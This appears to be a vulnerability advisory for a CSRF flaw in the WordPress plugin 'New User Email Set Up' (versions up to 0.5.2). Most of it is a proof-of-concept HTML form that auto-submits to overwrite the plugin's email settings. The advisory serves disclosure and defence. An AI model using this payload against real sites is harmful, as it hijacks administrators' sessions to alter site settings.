Lucene search

K
wpexploitDaniel RufWPEX-ID:176D5761-4F01-4173-A70C-6052A6A9963E
HistoryMay 23, 2022 - 12:00 a.m.

New User Email Set Up <= 0.5.2 - Arbitrary Settings Update via CSRF

2022-05-2300:00:00
Daniel Ruf
68

0.001 Low

EPSS

Percentile

26.3%

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

<form id="test" action="https://example.com/wp-admin/options-general.php?page=new-user-email-set-up%2Fnewuseremailsetup.php" method="POST">
    <input type="text" name="option_page" value="nue-options-group">
    <input type="text" name="action" value="update">
    <input type="text" name="newuseremailhtml" value="text/HTML">
    <input type="text" name="newuseremailsubject" value="Welcome to hacked">
    <input type="text" name="newuseremailtext" value="hacked							">
    <input type="text" name="newuseremailfromaddress" value="Enter your admin email here">
    <input type="text" name="newuseremailfrom" value="Enter the name you want your admin email sent from here. eg. Admin">
    <input type="text" name="nue_submit" value="Save">
    <input type="text" name="newuseremailadmin" value="yes">
    <input type="text" name="newuseremailadminnotifydiff" value="no">
    <input type="text" name="newuseremailadminsubject" value="%blogname% - New User Registration">
    <input type="text" name="newuseremailadmintext" value="aaa">
    <input type="text" name="cmd" value="_s-xclick">
</form>
<script>
    document.getElementById("test").submit();
</script>

0.001 Low

EPSS

Percentile

26.3%

Related for WPEX-ID:176D5761-4F01-4173-A70C-6052A6A9963E